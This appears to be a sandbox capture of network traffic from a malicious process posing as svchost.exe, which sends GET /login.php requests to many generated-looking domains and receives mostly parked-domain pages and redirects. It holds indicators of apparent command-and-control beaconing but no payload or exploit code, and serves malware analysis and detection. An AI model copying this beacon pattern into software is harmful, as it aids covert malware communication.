                                                                                                                                                                                                              x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_TKaVdClm9R0mf84Aq6lImHXVDK09w8fz1TDCeUaxmbd32YVpw8265m/Im0tMmH5VNOIUUQ1cVBYK0ZR9+SAlbg==
                                                                                                                                                                                                              set-cookie: parking_session=41dc0dcd-166b-4eb6-a959-38d5d6625e06; expires=Mon, 11 Nov 2024 17:48:20 GMT; path=/
                                                                                                                                                                                                              Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_TKaVdClm9R0mf84Aq6lImHXVDK09w8fz1TDCeUaxmbd32YVpw8265m/Im0tMmH5VNOIUUQ1cVBYK0ZR9+SAlbg==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="pr
Nov 11, 2024 18:33:20.849129915 CET | 664 | IN
                                                                                                                                                                                                              Data Ascii: econnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNDFkYzBkY2QtMTY2Yi00ZWI2LWE5NTktMzhkNWQ2NjI1ZTA2IiwicGFnZV90aW1lIjoxNzMxMzQ2NDAwLCJwYWdlX3VybCI6I


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
28 | 192.168.2.8 | 49741 | 64.225.91.73 | 80 | 7652 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:33:22.029237032 CET | 243 | OUT | GET /login.php HTTP/1.1
Referer: http://www.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: qetyhyg.com
Nov 11, 2024 18:33:22.585340977 CET | 816 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                              server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                              date: Mon, 11 Nov 2024 17:33:22 GMT
                                                                                                                                                                                                              content-type: text/html
                                                                                                                                                                                                              content-length: 593
                                                                                                                                                                                                              last-modified: Wed, 22 Feb 2023 21:25:52 GMT
                                                                                                                                                                                                              etag: "63f68860-251"
                                                                                                                                                                                                              accept-ranges: bytes
                                                                                                                                                                                                              Data Ascii: <html><head> <meta http-equiv="refresh" content="5;url=https://nojs.domaincntrol.com" /></head><body> <script> let retries = 3, interval = 1000; (function retry() { fetch("https://domaincntrol.com/?orighost=" + window.location.href) .then(response => response.json()) .then(data => window.location.href = data) .catch(error => { if (retries > 0) { retries--; setTimeout(retry, interval); } else { console.error("Error: ", error); } }); })(); </script></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
29 | 192.168.2.8 | 62554 | 72.52.179.174 | 80 | 7652 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:33:22.603018045 CET | 243 | OUT | GET /login.php HTTP/1.1
Referer: http://www.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: gatyhub.com


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
30 | 192.168.2.8 | 62556 | 72.52.179.174 | 80 | 7652 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:33:23.309017897 CET | 243 | OUT | GET /login.php HTTP/1.1
Referer: http://www.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: gatyhub.com


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
31 | 192.168.2.8 | 58380 | 52.34.198.229 | 80 | 7652 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:33:28.383193016 CET | 243 | OUT | GET /login.php HTTP/1.1
Referer: http://www.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: lygyvuj.com
Nov 11, 2024 18:33:29.068587065 CET | 413 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                              Date: Mon, 11 Nov 2024 17:33:28 GMT
                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              Set-Cookie: btst=d7371abaead6f2ed2ae3bcdfd775fd67|66.23.206.109|1731346408|1731346408|0|1|0; path=/; domain=.lygyvuj.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                              Set-Cookie: snkz=66.23.206.109; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                              Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
32 | 192.168.2.8 | 60003 | 44.221.84.105 | 80 | 7652 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:33:31.747546911 CET | 243 | OUT | GET /login.php HTTP/1.1
Referer: http://www.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: gahyhiz.com
Nov 11, 2024 18:33:32.189516068 CET | 413 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                              Date: Mon, 11 Nov 2024 17:33:32 GMT
                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              Set-Cookie: btst=9e098e457d8bc47cb3cc9dafa314bbb2|66.23.206.109|1731346412|1731346412|0|1|0; path=/; domain=.gahyhiz.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                              Set-Cookie: snkz=66.23.206.109; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                              Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
33 | 192.168.2.8 | 50106 | 199.59.243.227 | 80 | 7652 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:33:33.991054058 CET | 305 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: vojyqem.com
                                                                                                                                                                                                              Cookie: parking_session=b5c85606-7b7e-4cde-a75c-fbd25dd3c807
Nov 11, 2024 18:33:34.420396090 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                              date: Mon, 11 Nov 2024 17:33:33 GMT
                                                                                                                                                                                                              content-type: text/html; charset=utf-8
                                                                                                                                                                                                              content-length: 1094
                                                                                                                                                                                                              x-request-id: 3b21829d-aacc-4764-8882-d2072c1f0f77
                                                                                                                                                                                                              cache-control: no-store, max-age=0
                                                                                                                                                                                                              accept-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                                                              critical-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                                                              vary: sec-ch-prefers-color-scheme
                                                                                                                                                                                                              x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_VMytHbmmrfMc+kzmiPYTt2uS2PDnHHj/p/2nCNN04G2eOrYX/LSI9ifattC96o92xCzWruQ65ql9+oondzcTDQ==
                                                                                                                                                                                                              set-cookie: parking_session=b5c85606-7b7e-4cde-a75c-fbd25dd3c807; expires=Mon, 11 Nov 2024 17:48:34 GMT
                                                                                                                                                                                                              Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_VMytHbmmrfMc+kzmiPYTt2uS2PDnHHj/p/2nCNN04G2eOrYX/LSI9ifattC96o92xCzWruQ65ql9+oondzcTDQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="preconnect


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
34 | 192.168.2.8 | 50107 | 162.255.119.102 | 80 | 7652 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:33:33.991657972 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: gahyqah.com
Nov 11, 2024 18:33:34.541893959 CET | 303 | IN | HTTP/1.1 302 Found
                                                                                                                                                                                                              Date: Mon, 11 Nov 2024 17:33:34 GMT
                                                                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                              Content-Length: 55
                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                              Location: http://www.gahyqah.com/login.php
                                                                                                                                                                                                              X-Served-By: Namecheap URL Forward
                                                                                                                                                                                                              Server: namecheap-nginx
                                                                                                                                                                                                              Data Raw: 3c 61 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 77 77 77 2e 67 61 68 79 71 61 68 2e 63 6f 6d 2f 6c 6f 67 69 6e 2e 70 68 70 27 3e 46 6f 75 6e 64 3c 2f 61 3e 2e 0a 0a
                                                                                                                                                                                                              Data Ascii: <a href='http://www.gahyqah.com/login.php'>Found</a>.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
35 | 192.168.2.8 | 50108 | 178.162.217.107 | 80 | 7652 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:33:33.993046999 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: gatyfus.com


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
36 | 192.168.2.8 | 50109 | 75.2.71.199 | 80 | 7652 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:33:34.076081038 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: puzylyp.com
Nov 11, 2024 18:33:34.503537893 CET | 166 | IN | HTTP/1.1 308 Permanent Redirect
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              Location: https://puzylyp.com/login.php
                                                                                                                                                                                                              Server: Caddy
                                                                                                                                                                                                              Date: Mon, 11 Nov 2024 17:33:34 GMT
                                                                                                                                                                                                              Content-Length: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
37 | 192.168.2.8 | 50110 | 178.162.217.107 | 80 | 7652 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:33:34.845693111 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: gatyfus.com


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
38 | 192.168.2.8 | 50113 | 91.195.240.19 | 80 | 7652 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:33:35.422492027 CET | 271 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: www.gahyqah.com
                                                                                                                                                                                                              Connection: Keep-Alive
Nov 11, 2024 18:33:36.066370964 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                              date: Mon, 11 Nov 2024 17:33:35 GMT
                                                                                                                                                                                                              content-type: text/html; charset=UTF-8
                                                                                                                                                                                                              transfer-encoding: chunked
                                                                                                                                                                                                              vary: Accept-Encoding
                                                                                                                                                                                                              expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                              cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                              pragma: no-cache
                                                                                                                                                                                                              x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_g5rlXs9RuRW4dglqQ5LydJEttSTVBsfpTg5YbTbTgxQyCxJaX/4wWztIAOuRl2yVYhX0WGF1Yaew3U85nGI5uA==
                                                                                                                                                                                                              last-modified: Mon, 11 Nov 2024 17:33:35 GMT
                                                                                                                                                                                                              x-cache-miss-from: parking-7596689c44-4sqbl
                                                                                                                                                                                                              server: Parking/1.0
                                                                                                                                                                                                              Data Ascii: 2E2<!DOCTYPE html><html lang="en" data-adblockkey=MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_g5rlXs9RuRW4dglqQ5LydJEttSTVBsfpTg5YbTbTgxQyCxJaX/4wWztIAOuRl2yVYhX0WGF1Yaew3U85nGI5uA==><head><meta charset="utf-8"><title>gahyqah.com&nbsp;-&nbsp;gahyqah Resources and Information.</title><meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0"><meta name="description" content="gahyqah.com is your first and best source for all of the information youre looking for. From g
                                                                                                                                                                                                              Data Ascii: order-radius:5px;padding:15px 25px;text-align:center;text-decoration:none;cursor:pointer;margin:5px;transition:.3s}.btn--success{background-color:#218838;border-color:#218838;color:#fff;font-size:x-large}.btn--su
                                                                                                                                                                                                              Nov 11, 2024 18:33:36.067975998 CET1236INData Raw: 63 63 65 73 73 3a 68 6f 76 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 31 61 36 62 32 63 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 31 61 36 62 32 63 3b 63 6f 6c 6f 72 3a 23 66 66 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 78 2d 6c
                                                                                                                                                                                                              Data Ascii: ccess:hover{background-color:#1a6b2c;border-color:#1a6b2c;color:#fff;font-size:x-large}.btn--success-sm{background-color:#218838;border-color:#218838;color:#fff;font-size:initial}.btn--success-sm:hover{background-color:#1a6b2c;border-color:#1a
                                                                                                                                                                                                              Nov 11, 2024 18:33:36.067989111 CET1236INData Raw: 68 5f 5f 73 6c 69 64 65 72 7b 62 6f 78 2d 73 68 61 64 6f 77 3a 30 20 30 20 31 70 78 20 23 30 30 37 62 66 66 7d 69 6e 70 75 74 3a 63 68 65 63 6b 65 64 2b 2e 73 77 69 74 63 68 5f 5f 73 6c 69 64 65 72 3a 62 65 66 6f 72 65 7b 2d 77 65 62 6b 69 74 2d
                                                                                                                                                                                                              Data Ascii: h__slider{box-shadow:0 0 1px #007bff}input:checked+.switch__slider:before{-webkit-transform:translateX(26px);-ms-transform:translateX(26px);transform:translateX(26px)}body{background-color:#0e162e;font-family:Arial,Helvetica,Verdana,"Lucida Gr
                                                                                                                                                                                                              Nov 11, 2024 18:33:36.071363926 CET1236INData Raw: 6d 2f 74 65 6d 70 6c 61 74 65 73 2f 62 67 2f 61 72 72 6f 77 73 2d 63 75 72 76 65 64 2e 70 6e 67 22 29 20 23 30 65 31 36 32 65 20 6e 6f 2d 72 65 70 65 61 74 20 63 65 6e 74 65 72 20 6c 65 66 74 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 39
                                                                                                                                                                                                              Data Ascii: m/templates/bg/arrows-curved.png") #0e162e no-repeat center left;background-size:94% 640px;flex-grow:2;-moz-transform:scaleX(-1);-o-transform:scaleX(-1);-webkit-transform:scaleX(-1);transform:scaleX(-1);z-index:-1;top:50px;position:inherit}.co


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
39 | 192.168.2.8 | 50117 | 103.224.212.210 | 80 | 7652 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:33:43.908159971 CET | 277 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: lyxynyx.com
                                                                                                                                                                                                              Cookie: __tad=1731346399.2937263
Nov 11, 2024 18:33:44.359770060 CET | 244 | IN | HTTP/1.1 302 Found
                                                                                                                                                                                                              date: Mon, 11 Nov 2024 17:33:44 GMT
                                                                                                                                                                                                              server: Apache
                                                                                                                                                                                                              location: http://ww25.lyxynyx.com/login.php?subid1=20241112-0433-4491-9018-901015a08e06
                                                                                                                                                                                                              content-length: 2
                                                                                                                                                                                                              content-type: text/html; charset=UTF-8
                                                                                                                                                                                                              connection: close
                                                                                                                                                                                                              Data Raw: 0a 0a
                                                                                                                                                                                                              Data Ascii:


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
40 | 192.168.2.8 | 50118 | 103.224.182.252 | 80 | 7652 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:33:44.198679924 CET | 277 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: vofycot.com
                                                                                                                                                                                                              Cookie: __tad=1731346399.8350699
Nov 11, 2024 18:33:44.759839058 CET | 242 | IN | HTTP/1.1 302 Found
                                                                                                                                                                                                              date: Mon, 11 Nov 2024 17:33:44 GMT
                                                                                                                                                                                                              server: Apache
                                                                                                                                                                                                              location: http://ww16.vofycot.com/login.php?sub1=20241112-0433-44f6-9e59-dc72adbb0086
                                                                                                                                                                                                              content-length: 2
                                                                                                                                                                                                              content-type: text/html; charset=UTF-8
                                                                                                                                                                                                              connection: close
                                                                                                                                                                                                              Data Raw: 0a 0a
                                                                                                                                                                                                              Data Ascii:


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
41 | 192.168.2.8 | 50121 | 199.59.243.227 | 80 | 7652 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:33:46.979023933 CET | 404 | OUT | GET /login.php?subid1=20241112-0433-4491-9018-901015a08e06 HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: ww25.lyxynyx.com
                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                              Cookie: __tad=1731346399.2937263; parking_session=41dc0dcd-166b-4eb6-a959-38d5d6625e06
Nov 11, 2024 18:33:47.403422117 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                              date: Mon, 11 Nov 2024 17:33:46 GMT
                                                                                                                                                                                                              content-type: text/html; charset=utf-8
                                                                                                                                                                                                              content-length: 1230
                                                                                                                                                                                                              x-request-id: 6290040b-748e-43d2-8b27-34b3bf238418
                                                                                                                                                                                                              cache-control: no-store, max-age=0
                                                                                                                                                                                                              accept-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                                                              critical-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                                                              vary: sec-ch-prefers-color-scheme
                                                                                                                                                                                                              x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_IG3B1PdxgkdvQiK6ZwVYhCa4fM6pkNzV3yeaPyZ97Kpsqmp41p2g/fVzcHP7llNRpulLq8NmAB3I3kltzWv8SA==
                                                                                                                                                                                                              set-cookie: parking_session=41dc0dcd-166b-4eb6-a959-38d5d6625e06; expires=Mon, 11 Nov 2024 17:48:47 GMT
                                                                                                                                                                                                              Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_IG3B1PdxgkdvQiK6ZwVYhCa4fM6pkNzV3yeaPyZ97Kpsqmp41p2g/fVzcHP7llNRpulLq8NmAB3I3kltzWv8SA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="preconnect


Session ID | Source IP | Source Port | Destination IP | Destination Port
42 | 192.168.2.8 | 50122 | 64.190.63.136 | 80
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:33:46.979320049 CET | 348 | OUT | GET /login.php?sub1=20241112-0433-44f6-9e59-dc72adbb0086 HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: ww16.vofycot.com
                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                              Cookie: __tad=1731346399.8350699
Nov 11, 2024 18:33:47.614780903 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                              date: Mon, 11 Nov 2024 17:33:47 GMT
                                                                                                                                                                                                              content-type: text/html; charset=UTF-8
                                                                                                                                                                                                              transfer-encoding: chunked
                                                                                                                                                                                                              vary: Accept-Encoding
                                                                                                                                                                                                              expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                              cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                              pragma: no-cache
                                                                                                                                                                                                              x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_m5A0R189VdRkhk6hmyfDOBi+fLPvinMypX1PgaLoCArcIYQprgYuUGmmAqrfmhsw4vTfrSS03w1iz0DYCdt3IA==
                                                                                                                                                                                                              last-modified: Mon, 11 Nov 2024 17:33:47 GMT
                                                                                                                                                                                                              x-cache-miss-from: parking-7596689c44-bsx5j
                                                                                                                                                                                                              server: Parking/1.0
                                                                                                                                                                                                              Data Ascii: 308<!DOCTYPE html><html lang="en" data-adblockkey=MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_m5A0R189VdRkhk6hmyfDOBi+fLPvinMypX1PgaLoCArcIYQprgYuUGmmAqrfmhsw4vTfrSS03w1iz0DYCdt3IA==><head><meta charset="utf-8"><title>vofycot.com&nbsp;-&nbsp;This website is for sale!&nbsp;-&nbsp;vofycot Resources and Information.</title><meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0"><meta name="description" content="This website is for sale! vofycot.com is your first and bes
                                                                                                                                                                                                              Data Ascii: 15D2ition:fixed;bottom:0;width:100%;background:#5f5f5f;font-size:12px;padding-top:15px;padding-bottom:15px}.container-cookie-message__content-text{color:#fff}.container-cookie-message__content-text{margin-left:15%;margin-right:15%}.container
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.616255045 CET212INData Raw: 65 72 2d 63 6f 6c 6c 61 70 73 65 3a 63 6f 6c 6c 61 70 73 65 7d 2e 63 6f 6f 6b 69 65 2d 6d 6f 64 61 6c 2d 77 69 6e 64 6f 77 5f 5f 63 6f 6e 74 65 6e 74 2d 62 6f 64 79 20 74 61 62 6c 65 20 74 64 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 31 35 70 78
                                                                                                                                                                                                              Data Ascii: er-collapse:collapse}.cookie-modal-window__content-body table td{padding-left:15px}.cookie-modal-window__content-necessary-cookies-row{background-color:#dee1e3}.disabled{display:none;z-index:-999}.btn{display:inl
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.616265059 CET1236INData Raw: 69 6e 65 2d 62 6c 6f 63 6b 3b 62 6f 72 64 65 72 2d 73 74 79 6c 65 3a 73 6f 6c 69 64 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 35 70 78 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 20 32 35 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72
                                                                                                                                                                                                              Data Ascii: ine-block;border-style:solid;border-radius:5px;padding:15px 25px;text-align:center;text-decoration:none;cursor:pointer;margin:5px;transition:.3s}.btn--success{background-color:#218838;border-color:#218838;color:#fff;font-size:x-large}.btn--suc
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.616899014 CET1236INData Raw: 62 6f 74 74 6f 6d 3a 34 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 69 74 69 6f 6e 3a 2e 34 73 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 2e 34 73 7d 2e 73 77 69 74 63 68 5f 5f 73 6c
                                                                                                                                                                                                              Data Ascii: bottom:4px;background-color:#fff;-webkit-transition:.4s;transition:.4s}.switch__slider--round{border-radius:34px}.switch__slider--round:before{border-radius:50%}input:checked+.switch__slider{background-color:#007bff}input:focus+.switch__slider
